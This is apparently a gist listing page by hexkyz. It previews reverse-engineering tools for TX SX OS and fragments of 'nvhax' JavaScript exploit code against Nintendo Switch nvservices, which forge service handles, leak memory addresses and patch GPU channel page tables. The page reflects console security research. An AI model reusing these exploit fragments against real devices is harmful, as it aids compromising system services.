hexkyz

View tx_decompress.py
# The following is adapted from https://github.com/reswitched/loaders/blob/master/nxo64.py
#
# ===========================================================================================
#
# Copyright 2017 Reswitched Team
#
# Permission to use, copy, modify, and/or distribute this software for any purpose with or
# without fee is hereby granted, provided that the above copyright notice and this permission
# notice appear in all copies.
#
View tx_unpack.py
###############################################
# TX SX OS unpacker - by hexkyz and naehrwert #
###############################################
from Crypto.Cipher import AES
from Crypto.Util import Counter
import os
import struct
"""
View tx_vmdis.py
###########################################################
# TX SX OS MIPS VM disassembler - by hexkyz and naehrwert #
###########################################################
import os
import re
import struct
host_calls_0 = {
0x8E943DA2 : "host_crc32 (ptr r4r5, len r6)",
View ipatch_decode.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
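/*
 * Number of elements in the array x.
 * Only meaningful when x is a true array: for a pointer the result is
 * sizeof(pointer) / sizeof(element), which is not an element count.
 * The argument is parenthesised before the dereference so that an
 * expression argument is dereferenced as a whole.
 */
#define ARRAYSIZE(x) (sizeof(x) / sizeof(*(x)))
/* NOTE(review): presumably the size in bytes of the fuse image this tool parses; confirm against the code that reads it. */
#define FUSE_IMAGE_SIZE 0x400
/* NOTE(review): presumably the base address at which the patched ROM is mapped; confirm against the code that uses it. */
#define ROM_BASE 0x100000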
View sploitcore_send_request.js
sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) {
var req_buf = this.malloc(0x1000);
if (show_log)
utils.log('Request buf: ' + utils.paddr(req_buf));
var request_reply = [0, 0];
var err_code = [0, 0];
// One handle and 2 words input type
View sploitcore_nvdrv_leak.js
sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
var temp_buf = this.malloc(0x1000);
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
// Setup buffers
var in_buf_ioctl = utils.add2(temp_buf, 0x000);
var out_buf_ioctl = utils.add2(temp_buf, 0x100);
var out_buf_status = utils.add2(temp_buf, 0x200);
var in_buf = utils.add2(temp_buf, 0x800);
var out_buf = utils.add2(temp_buf, 0x900);
View sploitcore_break_nvdrv.js
sploitcore.prototype.break_nvdrv = function(sm_handle) {
var meminfo = this.malloc(0x20);
var pageinfo = this.malloc(0x8);
// Leak nvservices base address
var nvdrv_base = this.get_nvdrv_base(sm_handle);
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
View sploitcore_nvhax.js
/*
nvhax exploit
*/
// Global nvservices exploit context
sploitcore.prototype.nvdrv_exp_ctx = {};
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) {
// Forge a new service handle for NVDRV
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t");
View nvhax_find_channel.js
sploitcore.prototype.nvhax_find_channel = function(hw_num) {
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100);
var test_addr = [0, 0];
var ch_base_addr = [0, 0];
// Look for user channel
while (test_addr[1] < 0x80)
{
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false);
View nvhax_patch_channel.js
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) {
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Page directory is always at channel + 0x15000
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000);
// Read page directory base IOVA
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200));
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204));